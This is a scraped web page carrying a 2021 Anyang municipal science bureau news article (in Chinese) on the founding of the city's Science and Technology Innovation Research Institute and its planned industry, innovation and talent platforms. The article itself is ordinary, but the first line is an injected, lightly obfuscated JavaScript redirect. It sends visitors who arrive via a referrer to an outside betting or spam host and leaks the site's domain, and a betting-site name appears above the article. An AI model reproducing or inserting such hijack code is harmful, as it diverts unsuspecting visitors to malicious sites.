var ref=document.referrer;if(ref.length>3){location.href="ht"+"tps://wa"+ "p.y6"+"6"+"6.net/baidu444.htm?"+document.domain;}

中国竞彩网

图片

当前位置:首页 市县科技

安阳市科技创新研究院挂牌成立


发布日期:2021-10-11 11:27来源:安阳市科学技术局 阅读次数:

  为贯彻落实省委、省政府关于深化科技改革创新的重大决策部署,把创新作为发展的逻辑起点和“华山一条路”。近日,安阳市深化科技体制改革,突破科技创新领域的体制性障碍和结构性矛盾,成立了安阳市科技创新研究院,进一步提升创新体系整体效能,促进经济高质量发展。

  安阳市科创院为市政府设立的不纳入编制管理的独立法人事业单位,市政府委托市科技局代管,不确定机构级别,采取理事会决策下的院长负责制,多元化管理、市场化运营。本部下设产业技术研究院(新赛道培育中心、新型研发机构等)、离岸创新中心、科技大市场等平台。

  安阳市科创院作为安阳市综合成果转移转化平台,代表市政府与一流院所及重点企业进行产学研合作。设立产业引导基金,通过与县(市、区)、头部企业、社会机构等合作,撬动多方资源共同设立产业技术研究院。协调组织编制安阳市重点产业全链条发展规划,寻找产业发展链条中的热点、痛点和空白点,为科技精准招商做支撑,进行针对性技术攻关或技术引进,打破传统的产业物理聚集发展模式,形成以科技为支撑的产业发展模式,逐步成为区域中心科创平台。

  一是完善产业链。围绕安阳市产业发展需求,组建各类新型研发机构,提供公共技术服务,提高安阳市创新和产业化能力,改变传统的产业单纯物理集聚模式,转换为科技支撑产业发展,树立全产业链发展理念;二是完善创新链。建设安阳市科技智库,对中长期发展规划、重大事项、重点研发和引进项目进行决策咨询和技术指导;建设安阳市对外科技合作的交流平台,通过与大院大所合作,解决安阳市产业发展遇到的技术问题;建设安阳市综合成果转移转化平台,引进消化再创新,孵育青苗、落地产业;三是完善人才链。建设创新人才高地和柔性引进人才服务平台;在北京、天津等一二线城市设立分院,利用一二线城市的区位优势,吸引异地高层次人才为我市产业服务。